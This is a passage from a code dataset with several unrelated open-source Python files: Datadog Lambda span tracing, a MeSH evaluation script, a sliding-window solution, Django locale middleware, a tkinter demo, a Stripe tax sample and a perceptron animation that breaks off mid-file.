= None\n if decode_authorizer_context:\n upstream_authorizer_span, finish_time_ns = process_injected_data(\n event, request_time_epoch_ms, args, tags\n )\n span = tracer.trace(\"aws.apigateway.websocket\", **args)\n if span:\n span.set_tags(tags)\n span.start_ns = int(\n finish_time_ns\n if finish_time_ns is not None\n else request_time_epoch_ms * 1e6\n )\n if upstream_authorizer_span:\n span.parent_id = upstream_authorizer_span.span_id\n return span\n\n\ndef create_inferred_span_from_api_gateway_event(\n event, context, decode_authorizer_context: bool = True\n):\n request_context = event.get(\"requestContext\")\n domain = request_context.get(\"domainName\", \"\")\n api_id = request_context.get(\"apiId\")\n service_name = determine_service_name(\n service_mapping, api_id, \"lambda_api_gateway\", domain\n )\n method = event.get(\"httpMethod\")\n path = event.get(\"path\")\n resource = \"{0} {1}\".format(method, path)\n tags = {\n \"operation_name\": \"aws.apigateway.rest\",\n \"http.url\": domain + path,\n \"endpoint\": path,\n \"http.method\": method,\n \"resource_names\": resource,\n \"apiid\": api_id,\n \"apiname\": api_id,\n \"stage\": request_context.get(\"stage\"),\n \"request_id\": context.aws_request_id,\n }\n request_time_epoch_ms = int(request_context.get(\"requestTimeEpoch\"))\n if is_api_gateway_invocation_async(event):\n InferredSpanInfo.set_tags(tags, tag_source=\"self\", synchronicity=\"async\")\n else:\n InferredSpanInfo.set_tags(tags, tag_source=\"self\", synchronicity=\"sync\")\n args = {\n \"service\": service_name,\n \"resource\": resource,\n \"span_type\": \"http\",\n }\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n upstream_authorizer_span = None\n finish_time_ns = None\n if decode_authorizer_context:\n upstream_authorizer_span, finish_time_ns = process_injected_data(\n event, request_time_epoch_ms, args, tags\n )\n span = tracer.trace(\"aws.apigateway\", **args)\n if span:\n span.set_tags(tags)\n # start time pushed by the inserted authorizer span\n span.start_ns = int(\n finish_time_ns\n if finish_time_ns is not None\n else request_time_epoch_ms * 1e6\n )\n if upstream_authorizer_span:\n span.parent_id = upstream_authorizer_span.span_id\n return span\n\n\ndef create_inferred_span_from_http_api_event(\n event, context, decode_authorizer_context: bool = True\n):\n request_context = event.get(\"requestContext\")\n domain = request_context.get(\"domainName\")\n api_id = request_context.get(\"apiId\")\n service_name = determine_service_name(\n service_mapping, api_id, \"lambda_api_gateway\", domain\n )\n method = request_context.get(\"http\", {}).get(\"method\")\n path = event.get(\"rawPath\")\n resource = \"{0} {1}\".format(method, path)\n tags = {\n \"operation_name\": \"aws.httpapi\",\n \"endpoint\": path,\n \"http.url\": domain + path,\n \"http.method\": request_context.get(\"http\", {}).get(\"method\"),\n \"http.protocol\": request_context.get(\"http\", {}).get(\"protocol\"),\n \"http.source_ip\": request_context.get(\"http\", {}).get(\"sourceIp\"),\n \"http.user_agent\": request_context.get(\"http\", {}).get(\"userAgent\"),\n \"resource_names\": resource,\n \"request_id\": context.aws_request_id,\n \"apiid\": api_id,\n \"apiname\": api_id,\n \"stage\": request_context.get(\"stage\"),\n }\n request_time_epoch_ms = int(request_context.get(\"timeEpoch\"))\n if is_api_gateway_invocation_async(event):\n InferredSpanInfo.set_tags(tags, tag_source=\"self\", synchronicity=\"async\")\n else:\n InferredSpanInfo.set_tags(tags, tag_source=\"self\", synchronicity=\"sync\")\n args = {\n \"service\": service_name,\n \"resource\": resource,\n \"span_type\": \"http\",\n }\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n inferred_span_start_ns = request_time_epoch_ms * 1e6\n if decode_authorizer_context:\n injected_authorizer_data = get_injected_authorizer_data(event, True)\n if injected_authorizer_data:\n inferred_span_start_ns = injected_authorizer_data.get(\n Headers.Parent_Span_Finish_Time\n )\n span = tracer.trace(\"aws.httpapi\", **args)\n if span:\n span.set_tags(tags)\n span.start_ns = int(inferred_span_start_ns)\n return span\n\n\ndef create_inferred_span_from_sqs_event(event, context):\n trace_ctx = tracer.current_trace_context()\n\n event_record = get_first_record(event)\n event_source_arn = event_record.get(\"eventSourceARN\")\n queue_name = event_source_arn.split(\":\")[-1]\n service_name = determine_service_name(\n service_mapping, queue_name, \"lambda_sqs\", \"sqs\"\n )\n tags = {\n \"operation_name\": \"aws.sqs\",\n \"resource_names\": queue_name,\n \"queuename\": queue_name,\n \"event_source_arn\": event_source_arn,\n \"receipt_handle\": event_record.get(\"receiptHandle\"),\n \"sender_id\": event_record.get(\"attributes\", {}).get(\"SenderId\"),\n }\n InferredSpanInfo.set_tags(tags, tag_source=\"self\", synchronicity=\"async\")\n request_time_epoch = event_record.get(\"attributes\", {}).get(\"SentTimestamp\")\n args = {\n \"service\": service_name,\n \"resource\": queue_name,\n \"span_type\": \"web\",\n }\n start_time = int(request_time_epoch) / 1000\n\n upstream_span = None\n if \"body\" in event_record:\n body_str = event_record.get(\"body\", {})\n try:\n body = json.loads(body_str)\n\n # logic to deal with SNS => SQS event\n if body.get(\"Type\", \"\") == \"Notification\" and \"TopicArn\" in body:\n logger.debug(\"Found SNS message inside SQS event\")\n upstream_span = create_inferred_span_from_sns_event(\n create_sns_event(body), context\n )\n upstream_span.finish(finish_time=start_time)\n\n # EventBridge => SQS\n elif body.get(\"detail\"):\n detail = body.get(\"detail\")\n if detail.get(\"_datadog\"):\n logger.debug(\"Found an EventBridge message inside SQS event\")\n upstream_span = create_inferred_span_from_eventbridge_event(\n body, context\n )\n upstream_span.finish(finish_time=start_time)\n\n except Exception as e:\n logger.debug(\n \"Unable to create upstream span from SQS message, with error %s\" % e\n )\n pass\n\n # trace context needs to be set again as it is reset\n # when sns_span.finish executes\n tracer.context_provider.activate(trace_ctx)\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n span = tracer.trace(\"aws.sqs\", **args)\n if span:\n span.set_tags(tags)\n span.start = start_time\n if upstream_span:\n span.parent_id = upstream_span.span_id\n\n return span\n\n\ndef create_inferred_span_from_sns_event(event, context):\n event_record = get_first_record(event)\n sns_message = event_record.get(\"Sns\")\n topic_arn = event_record.get(\"Sns\", {}).get(\"TopicArn\")\n topic_name = topic_arn.split(\":\")[-1]\n service_name = determine_service_name(\n service_mapping, topic_name, \"lambda_sns\", \"sns\"\n )\n tags = {\n \"operation_name\": \"aws.sns\",\n \"resource_names\": topic_name,\n \"topicname\": topic_name,\n \"topic_arn\": topic_arn,\n \"message_id\": sns_message.get(\"MessageId\"),\n \"type\": sns_message.get(\"Type\"),\n }\n\n # Subject not available in SNS => SQS scenario\n if \"Subject\" in sns_message and sns_message[\"Subject\"]:\n tags[\"subject\"] = sns_message.get(\"Subject\")\n\n InferredSpanInfo.set_tags(tags, tag_source=\"self\", synchronicity=\"async\")\n sns_dt_format = \"%Y-%m-%dT%H:%M:%S.%fZ\"\n timestamp = event_record.get(\"Sns\", {}).get(\"Timestamp\")\n dt = datetime.strptime(timestamp, sns_dt_format)\n\n args = {\n \"service\": service_name,\n \"resource\": topic_name,\n \"span_type\": \"web\",\n }\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n span = tracer.trace(\"aws.sns\", **args)\n if span:\n span.set_tags(tags)\n span.start = dt.replace(tzinfo=timezone.utc).timestamp()\n return span\n\n\ndef create_inferred_span_from_kinesis_event(event, context):\n event_record = get_first_record(event)\n event_source_arn = event_record.get(\"eventSourceARN\")\n event_id = event_record.get(\"eventID\")\n stream_name = event_source_arn.split(\":\")[-1]\n shard_id = event_id.split(\":\")[0]\n service_name = determine_service_name(\n service_mapping, stream_name, \"lambda_kinesis\", \"kinesis\"\n )\n tags = {\n \"operation_name\": \"aws.kinesis\",\n \"resource_names\": stream_name,\n \"streamname\": stream_name,\n \"shardid\": shard_id,\n \"event_source_arn\": event_source_arn,\n \"event_id\": event_id,\n \"event_name\": event_record.get(\"eventName\"),\n \"event_version\": event_record.get(\"eventVersion\"),\n \"partition_key\": event_record.get(\"kinesis\", {}).get(\"partitionKey\"),\n }\n InferredSpanInfo.set_tags(tags, tag_source=\"self\", synchronicity=\"async\")\n request_time_epoch = event_record.get(\"kinesis\", {}).get(\n \"approximateArrivalTimestamp\"\n )\n\n args = {\n \"service\": service_name,\n \"resource\": stream_name,\n \"span_type\": \"web\",\n }\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n span = tracer.trace(\"aws.kinesis\", **args)\n if span:\n span.set_tags(tags)\n span.start = request_time_epoch\n return span\n\n\ndef create_inferred_span_from_dynamodb_event(event, context):\n event_record = get_first_record(event)\n event_source_arn = event_record.get(\"eventSourceARN\")\n table_name = event_source_arn.split(\"/\")[1]\n service_name = determine_service_name(\n service_mapping, table_name, \"lambda_dynamodb\", \"dynamodb\"\n )\n dynamodb_message = event_record.get(\"dynamodb\")\n tags = {\n \"operation_name\": \"aws.dynamodb\",\n \"resource_names\": table_name,\n \"tablename\": table_name,\n \"event_source_arn\": event_source_arn,\n \"event_id\": event_record.get(\"eventID\"),\n \"event_name\": event_record.get(\"eventName\"),\n \"event_version\": event_record.get(\"eventVersion\"),\n \"stream_view_type\": dynamodb_message.get(\"StreamViewType\"),\n \"size_bytes\": str(dynamodb_message.get(\"SizeBytes\")),\n }\n InferredSpanInfo.set_tags(tags, synchronicity=\"async\", tag_source=\"self\")\n request_time_epoch = event_record.get(\"dynamodb\", {}).get(\n \"ApproximateCreationDateTime\"\n )\n args = {\n \"service\": service_name,\n \"resource\": table_name,\n \"span_type\": \"web\",\n }\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n span = tracer.trace(\"aws.dynamodb\", **args)\n if span:\n span.set_tags(tags)\n\n span.start = int(request_time_epoch)\n return span\n\n\ndef create_inferred_span_from_s3_event(event, context):\n event_record = get_first_record(event)\n bucket_name = event_record.get(\"s3\", {}).get(\"bucket\", {}).get(\"name\")\n service_name = determine_service_name(\n service_mapping, bucket_name, \"lambda_s3\", \"s3\"\n )\n tags = {\n \"operation_name\": \"aws.s3\",\n \"resource_names\": bucket_name,\n \"event_name\": event_record.get(\"eventName\"),\n \"bucketname\": bucket_name,\n \"bucket_arn\": event_record.get(\"s3\", {}).get(\"bucket\", {}).get(\"arn\"),\n \"object_key\": event_record.get(\"s3\", {}).get(\"object\", {}).get(\"key\"),\n \"object_size\": str(event_record.get(\"s3\", {}).get(\"object\", {}).get(\"size\")),\n \"object_etag\": event_record.get(\"s3\", {}).get(\"object\", {}).get(\"eTag\"),\n }\n InferredSpanInfo.set_tags(tags, synchronicity=\"async\", tag_source=\"self\")\n dt_format = \"%Y-%m-%dT%H:%M:%S.%fZ\"\n timestamp = event_record.get(\"eventTime\")\n dt = datetime.strptime(timestamp, dt_format)\n\n args = {\n \"service\": service_name,\n \"resource\": bucket_name,\n \"span_type\": \"web\",\n }\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n span = tracer.trace(\"aws.s3\", **args)\n if span:\n span.set_tags(tags)\n span.start = dt.replace(tzinfo=timezone.utc).timestamp()\n return span\n\n\ndef create_inferred_span_from_eventbridge_event(event, context):\n source = event.get(\"source\")\n service_name = determine_service_name(\n service_mapping, source, \"lambda_eventbridge\", \"eventbridge\"\n )\n tags = {\n \"operation_name\": \"aws.eventbridge\",\n \"resource_names\": source,\n \"detail_type\": event.get(\"detail-type\"),\n }\n InferredSpanInfo.set_tags(\n tags,\n synchronicity=\"async\",\n tag_source=\"self\",\n )\n dt_format = \"%Y-%m-%dT%H:%M:%SZ\"\n timestamp = event.get(\"time\")\n dt = datetime.strptime(timestamp, dt_format)\n\n args = {\n \"service\": service_name,\n \"resource\": source,\n \"span_type\": \"web\",\n }\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n span = tracer.trace(\"aws.eventbridge\", **args)\n if span:\n span.set_tags(tags)\n span.start = dt.replace(tzinfo=timezone.utc).timestamp()\n return span\n\n\ndef create_function_execution_span(\n context,\n function_name,\n is_cold_start,\n is_proactive_init,\n trace_context_source,\n merge_xray_traces,\n trigger_tags,\n parent_span=None,\n):\n tags = {}\n if context:\n function_arn = (context.invoked_function_arn or \"\").lower()\n tk = function_arn.split(\":\")\n function_arn = \":\".join(tk[0:7]) if len(tk) > 7 else function_arn\n function_version = tk[7] if len(tk) > 7 else \"$LATEST\"\n tags = {\n \"cold_start\": str(is_cold_start).lower(),\n \"function_arn\": function_arn,\n \"function_version\": function_version,\n \"request_id\": context.aws_request_id,\n \"resource_names\": context.function_name,\n \"functionname\": context.function_name.lower()\n if context.function_name\n else None,\n \"datadog_lambda\": datadog_lambda_version,\n \"dd_trace\": ddtrace_version,\n \"span.name\": \"aws.lambda\",\n }\n if is_proactive_init:\n tags[\"proactive_initialization\"] = str(is_proactive_init).lower()\n if trace_context_source == TraceContextSource.XRAY and merge_xray_traces:\n tags[\"_dd.parent_source\"] = trace_context_source\n tags.update(trigger_tags)\n args = {\n \"service\": \"aws.lambda\",\n \"resource\": function_name,\n \"span_type\": \"serverless\",\n }\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n span = tracer.trace(\"aws.lambda\", **args)\n if span:\n span.set_tags(tags)\n if parent_span:\n span.parent_id = parent_span.span_id\n return span\n\n\ndef mark_trace_as_error_for_5xx_responses(context, status_code, span):\n if len(status_code) == 3 and status_code.startswith(\"5\"):\n submit_errors_metric(context)\n if span:\n span.error = 1\n\n\nclass InferredSpanInfo(object):\n BASE_NAME = \"_inferred_span\"\n SYNCHRONICITY = f\"{BASE_NAME}.synchronicity\"\n TAG_SOURCE = f\"{BASE_NAME}.tag_source\"\n\n @staticmethod\n def set_tags(\n tags: Dict[str, str],\n synchronicity: Optional[Literal[\"sync\", \"async\"]] = None,\n tag_source: Optional[Literal[\"labmda\", \"self\"]] = None,\n ):\n if synchronicity is not None:\n tags[InferredSpanInfo.SYNCHRONICITY] = str(synchronicity)\n if tag_source is not None:\n tags[InferredSpanInfo.TAG_SOURCE] = str(tag_source)\n\n @staticmethod\n def set_tags_to_span(\n span: Span,\n synchronicity: Optional[Literal[\"sync\", \"async\"]] = None,\n tag_source: Optional[Literal[\"labmda\", \"self\"]] = None,\n ):\n if synchronicity is not None:\n span.set_tags({InferredSpanInfo.SYNCHRONICITY: synchronicity})\n if tag_source is not None:\n span.set_tags({InferredSpanInfo.TAG_SOURCE: str(tag_source)})\n\n @staticmethod\n def is_async(span: Span) -> bool:\n if not span:\n return False\n try:\n return span.get_tag(InferredSpanInfo.SYNCHRONICITY) == \"async\"\n except Exception as e:\n logger.debug(\n \"Unabled to read the %s tag, returning False. \\\n Reason: %s.\",\n InferredSpanInfo.SYNCHRONICITY,\n e,\n )\n return False\n","repo_name":"DataDog/datadog-lambda-python","sub_path":"datadog_lambda/tracing.py","file_name":"tracing.py","file_ext":"py","file_size_in_byte":49336,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"31"} +{"seq_id":"23738505629","text":"#!/usr/bin/env python3\nimport sys\nimport math\nimport logging\nimport argparse\nfrom random import choice\nfrom itertools import permutations\n\nfrom scipy.stats import normaltest\nfrom scipy.special import ndtr\n\n\ndef check_intersection(elements, mesh):\n return len({el for el in elements if el in mesh})\n\ndef get_random_elements(corpus, number):\n if len(corpus) < number:\n raise Exception(\"Corpus is smaller than required number of elements for evaluation\")\n\n elements = set()\n\n # add a random keyword until there are the required number\n # keywords is a set so there will be no duplicates\n while len(elements) < number:\n elements.add(choice(corpus))\n\n return elements\n\n# this is used to convert mesh into a suitable set for 'in' checking\n# millions of times for bigrams. for each item in mesh, if the item \n# consists of 2 or more words, then all 2-length permutations are added \n# to the set\n#\n# NOTE: this is not memory efficient, but fine for now\ndef get_bigram_set(mesh):\n mesh_out = set()\n\n for element in mesh:\n element = element.split()\n \n if len(element) > 1:\n # dedup\n element = list(dict.fromkeys(element))\n \n for permutation in permutations(element, 2):\n mesh_out.add(\" \".join(permutation))\n\n return mesh_out\n\n# NOTE: currently this is just going to assume keywords/bigrams based \n# on the split length\ndef run_trials(corpus, mesh, num_elements, num_trials):\n logger = logging.getLogger(__name__)\n\n random_intersect_results = []\n \n for _ in range(num_trials):\n elements = get_random_elements(corpus, num_elements)\n random_intersect_results.append(check_intersection(elements, mesh))\n \n return random_intersect_results\n \ndef compute_p_val(method_intersect_len, random_intersect_results):\n logger = logging.getLogger(__name__)\n\n # check for normality of random_intersect_results\n k2, p = normaltest(random_intersect_results)\n logger.info(f\"normaltest p-val: {p}\")\n \n x_bar = sum(random_intersect_results) / len(random_intersect_results)\n \n numer = sum([(x - x_bar) ** 2 for x in random_intersect_results])\n std_dev = math.sqrt(numer / (len(random_intersect_results) - 1))\n \n if std_dev > 0:\n z = (method_intersect_len - x_bar) / std_dev\n else:\n z = 0\n\n return 1 - ndtr(z)\n\ndef load_mesh(mesh_fp):\n with open(mesh_fp, encoding=\"ISO-8859-1\", mode=\"r\") as handle:\n mesh = [line.strip(\"\\n\") for line in handle]\n \n # mesh should be a set because later there are millions of checks to see\n # if an element is in the data structure\n return set(mesh)\n\ndef load_list(fp):\n items = []\n \n with open(fp, \"r\") as handle: \n for line in handle:\n line = line.strip(\"\\n\")\n if line:\n items.append(line)\n \n return items\n\ndef initialize_logger(debug=False, quiet=False):\n level = logging.INFO\n if debug:\n level = logging.DEBUG\n\n # Set up logging\n logger = logging.getLogger(__name__)\n logger.setLevel(level)\n handler = logging.FileHandler(\"eval.log\")\n formatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n if not quiet:\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(level)\n formatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n \n return logger\n\ndef get_args():\n logger = logging.getLogger(__name__)\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\", \"--corpus\", help=\"Path to input corpus file\", required=True)\n parser.add_argument(\"-r\", \"--result\", help=\"Path to results from our method\", required=True)\n parser.add_argument(\"-m\", \"--mesh\", help=\"Path to lemmatized MeSH file\", required=True)\n parser.add_argument(\"-t\", \"--trials\", help=\"Number of random trials to run, default=100000\",\n type=int, default=100000)\n \n args = parser.parse_args()\n \n # log delimiter\n logger.info(\"###############################\")\n logger.info(f\"Corpus: {args.corpus}\")\n logger.info(f\"Method results: {args.result}\")\n logger.info(f\"MeSH file: {args.mesh}\")\n logger.info(f\"Num. trials: {args.trials}\")\n\n return parser.parse_args()\n\n# thresh is just for the experiment!!!\ndef evaluate(corpus, method_result, mesh, n_trials, thresh, verbose=True):\n if verbose:\n logger = logging.getLogger(__name__)\n \n # bigram detection\n if len(corpus[0].split()) == 2:\n if verbose:\n logger.info(\"Bigrams detected\")\n mesh = get_bigram_set(mesh)\n \n # get result metric for our method\n method_intersect_len = check_intersection(method_result, mesh)\n \n # run trials\n random_intersect_results = run_trials(corpus, mesh, len(method_result), n_trials)\n random_mean = sum(random_intersect_results) / len(random_intersect_results)\n\n p = compute_p_val(method_intersect_len, random_intersect_results)\n\n if verbose:\n logger.info(f\"Method intersect length: {method_intersect_len}\")\n logger.info(f\"Random intersect mean: {random_mean}\")\n logger.info(f\"Random intersect max: {max(random_intersect_results)}\")\n logger.info(f\"p: {p}\") \n\n return (thresh, p, method_intersect_len, len(method_result), random_mean, max(random_intersect_results))\n\nif __name__ == \"__main__\":\n logger = initialize_logger()\n\n args = get_args()\n\n # load in things\n corpus = load_list(args.corpus)\n method_results = load_list(args.result)\n mesh = load_mesh(args.mesh)\n \n _ = evaluate(corpus, method_result, mesh, args.trials)\n","repo_name":"wigasper/topic-hierarchy","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":5804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23341606804","text":"# -*- coding: utf-8 -*-\r\n# @Time : 2020/5/1 19:02\r\n# @Author : Shajiu\r\n# @FileName: maxInWindows.py\r\n# @Software: PyCharm\r\n# @Github :https://github.com/Shajiu\r\n\"\"\"\r\n题目;\r\n 给定一个数组和滑动窗口的大小,找出所有滑动窗口里数值的最大值。例如,\r\n 如果输入数组{2,3,4,2,6,2,5,1}及滑动窗口的大小3,那么一共存在6个滑动窗口,\r\n 他们的最大值分别为{4,4,6,6,6,5}; 针对数组{2,3,4,2,6,2,5,1}的滑动窗口有以下6个:\r\n {[2,3,4],2,6,2,5,1}, {2,[3,4,2],6,2,5,1}, {2,3,[4,2,6],2,5,1},\r\n {2,3,4,[2,6,2],5,1}, {2,3,4,2,[6,2,5],1}, {2,3,4,2,6,[2,5,1]}。\r\n\"\"\"\r\nclass Solution:\r\n def maxInWindoes(self,num,size):\r\n if size<=0:\r\n return []\r\n res=[]\r\n for i in range(len(num)-size+1):\r\n res.append(max(num[i:i+size]))\r\n return res\r\n","repo_name":"Shajiu/AlgorithmBook","sub_path":"Offer_Code/Offer_Code/maxInWindows.py","file_name":"maxInWindows.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"37245778422","text":"from django.conf import settings\nfrom django.http import HttpResponseRedirect\nfrom django.utils.translation import LANGUAGE_SESSION_KEY\nfrom django.utils.functional import cached_property\nfrom django.core.urlresolvers import (\n get_resolver, get_script_prefix, is_valid_path\n)\nfrom .trans_country import (\n activate_country, get_country, set_country\n)\nfrom .utils import (\n get_countries_and_language, get_country_from_path, get_country_from_request\n)\nfrom .urls import CountryRegexURLResolver\n\n\nclass CountryLocaleMiddleware(object):\n response_redirect_class = HttpResponseRedirect\n\n def process_request(self, request):\n supported_country_codes = get_countries_and_language()\n country_code = get_country_from_request(request)\n\n if country_code in supported_country_codes and country_code is not None:\n activate_country(country_code)\n set_country(country_code, request)\n request.COUNTRY_CODE = country_code\n\n lang_code = supported_country_codes[country_code]\n if lang_code is not None:\n request.session[LANGUAGE_SESSION_KEY] = lang_code\n\n def process_response(self, request, response):\n country_code = get_country()\n country_from_path = get_country_from_path(request.path_info)\n if (response.status_code == 404 and not country_from_path\n and self.is_language_prefix_patterns_used):\n urlconf = getattr(request, 'urlconf', None)\n country_path = '/%s%s' % (country_code, request.path_info)\n path_valid = is_valid_path(country_path, urlconf)\n path_needs_slash = (\n not path_valid and (\n settings.APPEND_SLASH and not country_path.endswith('/')\n and is_valid_path('%s/' % country_path, urlconf)\n )\n )\n\n if path_valid or path_needs_slash:\n script_prefix = get_script_prefix()\n language_url = request.get_full_path(force_append_slash=path_needs_slash).replace(\n script_prefix,\n '%s%s/' % (script_prefix, country_code),\n 1\n )\n return self.response_redirect_class(language_url)\n\n return response\n\n @cached_property\n def is_language_prefix_patterns_used(self):\n for url_pattern in get_resolver(None).url_patterns:\n if isinstance(url_pattern, CountryRegexURLResolver):\n return True\n return False","repo_name":"ezdookie/django-country-site","sub_path":"django_country_site/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43738295171","text":"from tkinter import *\r\n\r\n\r\ndef upload():\r\n status.set(\"Busy...\")\r\n sbar.update()\r\n import time\r\n\r\n time.sleep(2)\r\n status.set(\"Ready \")\r\n\r\n\r\nroot = Tk()\r\nroot.geometry(\"500x400\")\r\nroot.title(\"Status Bar\")\r\n\r\nstatus = StringVar()\r\nstatus.set(\"Ready\")\r\nsbar = Label(root, textvariable=status, relief=SUNKEN, anchor=W)\r\nsbar.pack(side=BOTTOM, fill=X)\r\nButton(root, text=\"Upload\", command=upload).pack(pady=50)\r\nroot.mainloop()\r\n","repo_name":"PRINCE1503/Python_GUI-Code","sub_path":"16_Statusbar.py","file_name":"16_Statusbar.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"36397828549","text":"#! /usr/bin/env python3.6\n\n\"\"\"\nserver.py\nStripe Sample.\nPython 3.6 or newer required.\n\"\"\"\n\nimport stripe\nimport json\nimport os\nimport random\nfrom decimal import Decimal\n\nfrom flask import Flask, render_template, jsonify, request, send_from_directory\nfrom dotenv import load_dotenv, find_dotenv\n\n# Setup Stripe python client library\nload_dotenv(find_dotenv())\nstripe.api_key = os.getenv('STRIPE_SECRET_KEY')\nstripe.api_version = os.getenv('STRIPE_API_VERSION')\n\nstatic_dir = str(os.path.abspath(os.path.join(__file__ , \"..\", os.getenv(\"STATIC_DIR\"))))\napp = Flask(__name__, static_folder=static_dir,\n static_url_path=\"\", template_folder=static_dir)\n\n\n@app.route('/', methods=['GET'])\ndef get_example():\n # Display checkout page\n return render_template('index.html')\n\n\ndef calculate_order_amount(items):\n # Replace this constant with a calculation of the order's amount\n # Calculate the order total on the server to prevent\n # people from directly manipulating the amount on the client\n return 1400\n\n# Store tax amount for demo purposes\ntax_amount = 0\n\n\ndef calculate_tax_amount(postal_code, order_amount):\n # Use the postal code to calculate the amount of tax for the order\n # For the sample we will simply provide a random amount\n return random.randint(1, 500)\n\n\n@app.route('/stripe-key', methods=['GET'])\ndef fetch_key():\n # Send publishable key to client\n return jsonify({'publicKey': os.getenv('STRIPE_PUBLISHABLE_KEY')})\n\n\n@app.route('/calculate-tax', methods=['POST'])\ndef calculate_tax():\n global tax_amount\n data = json.loads(request.data)\n # Calculate order amount from items\n order_amount = calculate_order_amount(data['items'])\n # Calculate tax from order total and postal code\n tax_amount = calculate_tax_amount(data['postalCode'], order_amount)\n total = order_amount + tax_amount\n\n # Return new tax and total amounts to display on the client\n return jsonify({'tax': tax_amount / 100, 'total': total / 100})\n\n\n@app.route('/pay', methods=['POST'])\ndef pay():\n data = json.loads(request.data)\n try:\n if \"paymentIntentId\" not in data:\n global tax_amount\n order_amount = calculate_order_amount(data['items'])\n # Calculate tax from order total and postal code\n tax_amount = tax_amount or calculate_tax_amount(\n data['postalCode'], order_amount)\n\n # Create a new PaymentIntent for the order\n intent = stripe.PaymentIntent.create(\n amount=order_amount + tax_amount,\n currency=data['currency'],\n payment_method=data['paymentMethodId'],\n confirmation_method='manual',\n confirm=True\n )\n else:\n # Confirm the PaymentIntent to collect the money\n intent = stripe.PaymentIntent.confirm(data['paymentIntentId'])\n return generate_response(intent)\n except Exception as e:\n return jsonify(error=str(e)), 403\n\n\ndef generate_response(intent):\n status = intent['status']\n if status == 'requires_action' or status == 'requires_source_action':\n # Card requires authentication\n return jsonify({'requiresAction': True, 'paymentIntentId': intent['id'], 'clientSecret': intent['client_secret']})\n elif status == 'requires_payment_method' or status == 'requires_source':\n # Card was not properly authenticated, suggest a new payment method\n return jsonify({'error': 'Your card was denied, please provide a new payment method'})\n elif status == 'succeeded':\n # Payment is complete, authentication not required\n return jsonify({'clientSecret': intent['client_secret']})\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"stripe-archive/adding-sales-tax","sub_path":"without-webhooks/server/python/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"31"} +{"seq_id":"72570345047","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport matplotlib.animation as animation\nimport random\nimport randseq as rs\n\n\n\nX1=[]\nY1=[]\nZ1=[]\nX2=[]\nY2=[]\nZ2=[]\ndf = pd.read_csv(\"3D_Data.csv\")\nX = list(df['X1'])\nY = list(df['X2'])\nZ= list(df['X3'])\nlabel= list(df['Y'])\n\n#data01 = np.random.normal(5,1,size=[50, 3])\n#data12 = np.random.normal(50,1,size=[50, 3])\n\n\n\n \nX1 = []\nY1 = []\nZ1=[]\nfor i in range(1000):\n\t\n\tif label[i]==0:\n\t\tX2.append(X[i])\n\t\tY2.append(Y[i])\n\t\tZ2.append(Z[i])\n\t\tlabel[i]=-1\n\telse: \n\t\tX1.append(X[i])\n\t\tY1.append(Y[i])\n\t\tZ1.append(Z[i])\n\n\n\t\n\n\n\n#print(label)\nplt.rcParams[\"figure.figsize\"] = [15.00, 15.50]\nplt.rcParams[\"figure.autolayout\"] = False\n\nx = np.linspace(0, 10, 100)\ny = np.linspace(0, 10, 100)\n\nx, y = np.meshgrid(x, y)\n\n\nfig = plt.figure()\n\n#ax = fig.gca(projection='3d')\nax = fig.add_subplot(111,projection='3d')\n\n\"\"\" creating the sactter plot\"\"\"\n\n#ax.scatter(X,Y,Z, c='r', marker='o')\n\ndef init():\n\tax.scatter(0,0,0,c='r',marker='*')\n\treturn ax,\n\n\"\"\" the actual perceptron model\"\"\"\n\n\n\n\n\n\n\"\"\"the animation part\"\"\"\n\ndef updateweights(W,seq,sum,i):\n\tepsilon=0.01\n\talpha=0.001\n\tcount=0\n\t#print(W)\n\t#while(sum>epsilon and count<200):\n\t#Wprev=W.copy()\n\tvalue= W[0]+W[1]*X[seq[i]] + W[2]*Y[seq[i]] + W[3]*Z[seq[i]]\n\tprint(value,\"and\",label[seq[i]])\n\tcount+=1\n\tif value>0:\n\t\tv=1\n\telse:\n\t\tv=-1\n\t#print(\"i am in 1\",label[seq[i]])\n\tW[0]+=alpha*(label[seq[i]]-v)\n\tW[1]+= alpha*(label[seq[i]]-v)*X[seq[i]]\n\tW[2]+=alpha*(label[seq[i]]-v)*Y[seq[i]]\n\tW[3]+=alpha*(label[seq[i]]-v)*Z[seq[i]]\n\t#print(\"in the loops\",W,\" \",count)\n\n\n\n\t#print(W)\n\treturn [W[0],W[1],W[2],W[3]]\n\n\ndef perceptron(i,seq,sum,weights):\n\tax.clear()\n\tprint(i)\n\ti=i%1000\n\t#print(weights)\n\twprev=weights.copy()\n\n\tweights=updateweights(weights,seq,sum,i)\n\t#print(weights)\n\tsum=0\n\tfor j in range(len(weights)):\n\t\tsum+= (weights[j]-wprev[j])**2\n\tif 